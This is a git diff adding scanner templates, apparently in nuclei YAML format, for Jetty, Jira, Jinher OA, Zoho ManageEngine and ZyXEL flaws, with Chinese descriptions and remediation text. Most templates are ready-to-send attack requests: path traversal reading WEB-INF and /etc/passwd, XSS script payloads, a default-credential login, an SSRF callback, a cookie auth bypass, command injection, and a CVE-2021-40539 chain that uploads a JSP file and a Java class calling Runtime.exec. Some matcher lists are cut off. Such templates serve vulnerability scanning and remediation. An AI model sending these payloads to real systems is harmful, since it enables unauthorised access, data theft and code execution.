1.目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: + http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html +requests: +- matchers: + - type: status + status: + - 400 + - type: word + part: body + words: + - Illegal character 0x0 in state + matchers-condition: and + path: + - '{{BaseURL}}' + method: POST + headers: + Referer: \x00 diff --git a/config/51pwn/yaml/Jetty/CVE-2021-28164.yaml b/config/51pwn/yaml/Jetty/CVE-2021-28164.yaml new file mode 100755 index 000000000..b8613b9cd --- /dev/null +++ b/config/51pwn/yaml/Jetty/CVE-2021-28164.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-28164 +info: + name: Jetty Authorization Before Parsing and Canonicalization + author: + - l0ne1y + tags: + - cve + - cve2021 + - jetty + description: |- + Jetty WEB-INF 路径遍历导致敏感信息泄露漏洞 + Eclipse Jetty是Eclipse基金会的一个开源的、基于Java的Web服务器和Java Servlet容器。 + + Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 存在信息泄露漏洞,该漏洞允许请求的uri包含\\%2e or \\%2e\\%2e访问WEB-INF目录中受保护资源。 + reference: + - /~https://github.com/eclipse/jetty.project/security/advisories/ghsa-v7ff-8wcx-gmc5 + - /~https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty + - https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3cjira.kafka.apache.org%3e + severity: medium + classification: + cve-id: + - cve-2021-28164 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: "官方修复方案:\n1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:/~https://github.com/eclipse/jetty.project/security/advisories/GHSA-26vr-8j45-3r4w\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - + - java.sun.com + - type: word + part: header + words: + - application/xml + matchers-condition: and + path: + - '{{BaseURL}}/%2e/WEB-INF/web.xml' + method: GET diff --git a/config/51pwn/yaml/Jetty/CVE-2021-28169.yaml b/config/51pwn/yaml/Jetty/CVE-2021-28169.yaml new file mode 100755 index 000000000..bedaadca4 --- /dev/null +++ b/config/51pwn/yaml/Jetty/CVE-2021-28169.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-28169 +info: + name: Jetty Utility Servlets Information Disclosure + author: + - l0ne1y + tags: + - cve + - cve2021 + - jetty + description: |- + Jetty 通用 Servlets 组件 ConcatServlet双重编码路径请求导致信息泄露漏洞 + Eclipse Jetty 是 Eclipse 基金会的一个开源的、基于Java 的 Web 服务器和 Java Servlet 容器。 + Eclipse Jetty 中存在信息泄露漏洞,该漏洞源于通过对 ConcatServlet 的双重编码路径请求访问 WEB-INF 目录中的受保护资源。 + reference: + - https://twitter.com/sec715/status/1406787963569065988 + - https://nvd.nist.gov/vuln/detail/cve-2021-28169 + - /~https://github.com/eclipse/jetty.project/security/advisories/ghsa-gwcr-j4wh-j3cq + - https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3cusers.kafka.apache.org%3e + severity: medium + classification: + cve-id: + - cve-2021-28169 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq +requests: +- matchers: + - type: word + part: header + words: + - application/xml + - type: word + condition: and + part: body + words: + - + - java.sun.com + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/static?/%2557EB-INF/web.xml' + - '{{BaseURL}}/concat?/%2557EB-INF/web.xml' + method: GET diff --git a/config/51pwn/yaml/Jetty/CVE-2021-34429.yaml b/config/51pwn/yaml/Jetty/CVE-2021-34429.yaml new file mode 100755 index 000000000..60ac5b2f9 --- /dev/null +++ b/config/51pwn/yaml/Jetty/CVE-2021-34429.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-34429 +info: + name: Jetty Authorization Before Parsing and Canonicalization Variation + author: + - l0ne1y + tags: + - cve + - cve2021 + - jetty + description: |- + Jetty 特殊编码绕过导致WEB-INF 敏感信息泄露漏洞 + Eclipse Jetty是Eclipse基金会的一个开源的、基于Java的Web服务器和Java Servlet容器。 + + Eclipse Jetty 9.4.37-9.4.42、10.0.1-10.0.5 和 11.0.1-11.0.5版本存在信息泄露漏洞,攻击者可以使用一些编码字符制作 URI 来访问 WEB-INF 目录的内容或绕过一些安全限制。 + reference: + - /~https://github.com/eclipse/jetty.project/security/advisories/ghsa-vjv5-gp2w-65vm + - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3cdev.zookeeper.apache.org%3e + - https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3cissues.zookeeper.apache.org%3e + severity: medium + classification: + cve-id: + - cve-2021-34429 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: "官方修复方案:\n1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:/~https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - + - java.sun.com + - type: word + part: header + words: + - application/xml + matchers-condition: and + raw: + - |+ + GET /%u002e/WEB-INF/web.xml HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - |+ + GET /.%00/WEB-INF/web.xml HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + unsafe: true diff --git a/config/51pwn/yaml/Jinher oa/jinher-oa-default-login.yaml b/config/51pwn/yaml/Jinher oa/jinher-oa-default-login.yaml new file mode 100755 index 000000000..9f32c6577 --- /dev/null +++ b/config/51pwn/yaml/Jinher oa/jinher-oa-default-login.yaml @@ -0,0 +1,49 @@ +id: jinher-oa-default-login +info: + name: Jinher oa C6 Default Password + author: + - l0ne1y + tags: + - jinher + - default-login + description: |- + 金和OA系统默认口令登录漏洞 + 金和OA系统是专业oa协同办公管理平台,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用,二次开发,移动oa办公系统app下载等服务。其管理后台存在默认账户admin/000000。 + reference: + - /~https://github.com/nu0l/poc-wiki/blob/main/%e9%87%91%e5%92%8coa-c6-default-password.md + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: body + words: + - ϵͳ¹ÜÀíÔ±| + - ÄúºÃ||| + - type: word + part: header + words: + - SessionIDAdmin= + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}& + attack: pitchfork + payloads: + password: + - "000000" + username: + - admin diff --git a/config/51pwn/yaml/Jira/CVE-2007-0885.yaml b/config/51pwn/yaml/Jira/CVE-2007-0885.yaml new file mode 100755 index 000000000..caf5cd48e --- /dev/null +++ b/config/51pwn/yaml/Jira/CVE-2007-0885.yaml @@ -0,0 +1,44 @@ +id: CVE-2007-0885 +info: + name: Rainbow.Zen Jira XSS + author: + - l0ne1y + tags: + - cve + - cve2007 + - jira + - xss + description: |- + Atlassian JIRA 3.7.3 - BrowseProject.JSPA 跨站脚本漏洞 + 具有Zen(Rainbow.Zen)扩展名的Rainbow的jira/secure/BrowseProject.jspa中存在跨站脚本攻击漏洞。远程攻击者可以借助id参数,注入任意web脚本或HTML。 + reference: + - https://www.securityfocus.com/archive/1/459590/100/0/threaded + - http://www.securityfocus.com/bid/22503 + - http://osvdb.org/33683 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 + severity: medium + classification: + cve-id: + - cve-2007-0885 + remediation: |- + **官方修复方案** + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.atlassian.com/ + + **临时修复方案** + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + - '">' + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' + method: GET diff --git a/config/51pwn/yaml/Jira/CVE-2017-9506.yaml b/config/51pwn/yaml/Jira/CVE-2017-9506.yaml new file mode 100755 index 000000000..fa9239378 --- /dev/null +++ b/config/51pwn/yaml/Jira/CVE-2017-9506.yaml @@ -0,0 +1,51 @@ +id: CVE-2017-9506 +info: + name: Jira IconURIServlet SSRF + author: + - l0ne1y + tags: + - cve + - cve2017 + - atlassian + - jira + - ssrf + - oast + description: |- + Atlassian Jira OAuth Plugin SSRF漏洞 + Atlassian OAuth Plugin是澳大利亚Atlassian公司的一款用于访问个人Atlassian软件数据的授权插件。 + + Atlassian OAuth Plugin中的IconUriServlet存在安全漏洞。远程攻击者可利用该漏洞访问内部网络资源或执行跨站脚本攻击。 + reference: + - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html + - https://ecosystem.atlassian.net/browse/oauth-344 + - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 + severity: medium + classification: + cve-id: + - cve-2017-9506 + cwe-id: + - cwe-918 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://ecosystem.atlassian.net/browse/OAUTH-344 + + **临时修复方案** + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} diff --git a/config/51pwn/yaml/Jira/CVE-2018-5230.yaml b/config/51pwn/yaml/Jira/CVE-2018-5230.yaml new file mode 100755 index 000000000..252032959 --- /dev/null +++ b/config/51pwn/yaml/Jira/CVE-2018-5230.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-5230 +info: + name: Atlassian Confluence Status-List XSS + author: + - l0ne1y + description: |- + Atlassian Jira issue collector 跨站脚本漏洞 + + Atlassian JIRA是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。issue collector是其中的一个问题收集器。 + + Atlassian Jira中的issue collector的自定义字段的错误消息存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的HTML或JavaScript代码。以下版本受到影响:Atlassian Jira 7.6.6之前版本,7.7.4之前的7.7.0版本,7.8.4之前的7.8.0版本,7.9.2之前的7.9.0版本。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jira.atlassian.com/browse/JRASERVER-67289 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - ' + - adsf/js/ + matchers-condition: and + path: + - '{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E' + method: GET diff --git a/config/51pwn/yaml/Zoho ManageEngine ADSelfService Plus/CVE-2021-40539.yaml b/config/51pwn/yaml/Zoho ManageEngine ADSelfService Plus/CVE-2021-40539.yaml new file mode 100755 index 000000000..d0d369b8e --- /dev/null +++ b/config/51pwn/yaml/Zoho ManageEngine ADSelfService Plus/CVE-2021-40539.yaml @@ -0,0 +1,103 @@ +id: CVE-2021-40539 +info: + name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command + Execution + author: + - l0ne1y + description: |- + ZOHO ManageEngine ADSelfService Plus 认证绕过导致文件上传漏洞 + ZOHO ManageEngine ADSelfService Plus是美国卓豪(ZOHO)公司的针对 Active Directory 和云应用程序的集成式自助密码管理和单点登录解决方案。 + + Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致文件上传漏洞,进而执行命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.manageengine.com/products/self-service-password/service-pack.html +requests: +- matchers: + - type: word + words: + - 114f7ce498a54a1be1de1f1e5731d0ea + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 + + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="methodToCall" + + unspecified + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="Save" + + yes + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="form" + + smartcard + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="operation" + + Add + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2021-40539"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + --8b1ab266c41afb773af2e064bc526458-- + - | + POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b + + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="methodToCall" + + unspecified + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="Save" + + yes + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="form" + + smartcard + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="operation" + + Add + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" + + {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}} + --43992a07d9a30213782780204a9f032b-- + - | + POST /./RestAPI/Connection HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 + - | + GET /help/admin-guide/test.jsp HTTP/1.1 + Host: {{Hostname}} diff --git "a/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml" "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml" new file mode 100755 index 000000000..d0362e376 --- /dev/null +++ "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml" @@ -0,0 +1,29 @@ +id: CVE-2019-9955 +info: + name: Zyxel - Reflected Cross-site Scripting + author: + - l0ne1y + description: |- + 多款ZyXEL产品跨站脚本漏洞 + ZyXEL ZyWall 310等都是中国台湾合勤(ZyXEL)公司的产品。ZyXEL ZyWall 310是一款310系列VPN防火墙设备。ZyXEL ZyWall 110是一款110系列VPN防火墙设备。ZyXEL USG1900是一款下一代统一安全网关设备。 + + 多款Zyxel产品中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。以下产品受到影响:Zyxel ATP200、ATP500、ATP800、USG20-VPN、USG20W-VPN、USG40、USG40W、USG60、USG60W、USG110、USG210、USG310、USG1100、USG1900、USG2200-VPN、ZyWALL 110、ZyWALL 310、ZyWALL 1100。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.zyxel.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '";alert(''1'');//' + - Welcome + path: + - '{{BaseURL}}/?mp_idx=%22;alert(%271%27);//' + method: GET diff --git "a/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml" "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml" new file mode 100755 index 000000000..1568a33c5 --- /dev/null +++ "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml" @@ -0,0 +1,25 @@ +id: CVE-2020-9054 +info: + name: Zyxel NAS Firmware 5.21- Remote Code Execution + author: + - l0ne1y + description: |- + 多款ZyXEL产品操作系统命令注入漏洞 + 多款ZyXEL产品中存在操作系统命令注入漏洞。远程攻击者可借助特制的HTTP POST或GET请求利用该漏洞执行任意代码。以下产品及版本受到影响:使用V5.21(AAZF.7)C0之前版本固件的NAS326;使用V5.21(AASZ.3)C0之前版本固件的NAS520;使用V5.21(AATB.4)C0之前版本固件的NAS540;使用V5.21(ABAG.4)C0之前版本固件的NAS542;ZyXEL NSA210;ZyXEL NSA220;ZyXEL NSA220+;ZyXEL NSA221;ZyXEL NSA310;ZyXEL NSA310S;ZyXEL NSA320;ZyXEL NSA320S;ZyXEL NSA325;ZyXEL NSA325v2。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin'';cat /etc/passwd' + method: GET diff --git "a/config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml" "b/config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml" new file mode 100755 index 000000000..735b599ed --- /dev/null +++ "b/config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml" @@ -0,0 +1,36 @@ +id: CVE-2018-19326 +info: + name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal + author: + - l0ne1y + description: |- + Zyxel VMG1312-B10D 任意文件读取漏洞 + Zyxel VMG1312-B10D是合勤(ZyXEL)科技公司的一款无线网关设备。 + + Zyxel VMG1312-B10D 5.13(AAXA.8)C0之前版本中存在任意文件读取漏洞。攻击者可借助‘../’目录遍历序列利用该漏洞访问任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.zyxel.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: word + part: header + words: + - application/octet-stream + matchers-condition: and + path: + - '{{BaseURL}}/../../../../../../../../../../../../etc/passwd' + method: GET diff --git "a/config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml" "b/config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml" new file mode 100755 index 000000000..01157e6f1 --- /dev/null +++ "b/config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml" @@ -0,0 +1,32 @@ +id: CVE-2021-3297 +info: + name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass + author: + - l0ne1y + description: |- + Zyxel NBG2105 认证绕过漏洞 + Zyxel NBG2105是中国合勤科技(Zyxel)公司的一款路由器。 + + Zyxel NBG2105 V1.00 存在安全漏洞,该漏洞源于设置登录cookie提供了管理员权限。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.zyxel.com/us/en/support/security_advisories.shtml +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - Running Time + - Firmware Version + - Firmware Build Time + matchers-condition: and + raw: + - | + GET /status.htm HTTP/1.1 + Host: {{Hostname}} + Cookie: language=en; login=1 diff --git a/config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml b/config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml new file mode 100755 index 000000000..22507ce36 --- /dev/null +++ b/config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml @@ -0,0 +1,44 @@ +id: ahwebexperts-car-details-sqli +info: + name: ahwebexperts_car-details.php?uid=注入 + author: + - jim2g + description: | + ahwebexperts_car-details.php?uid=存在SQL注入 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 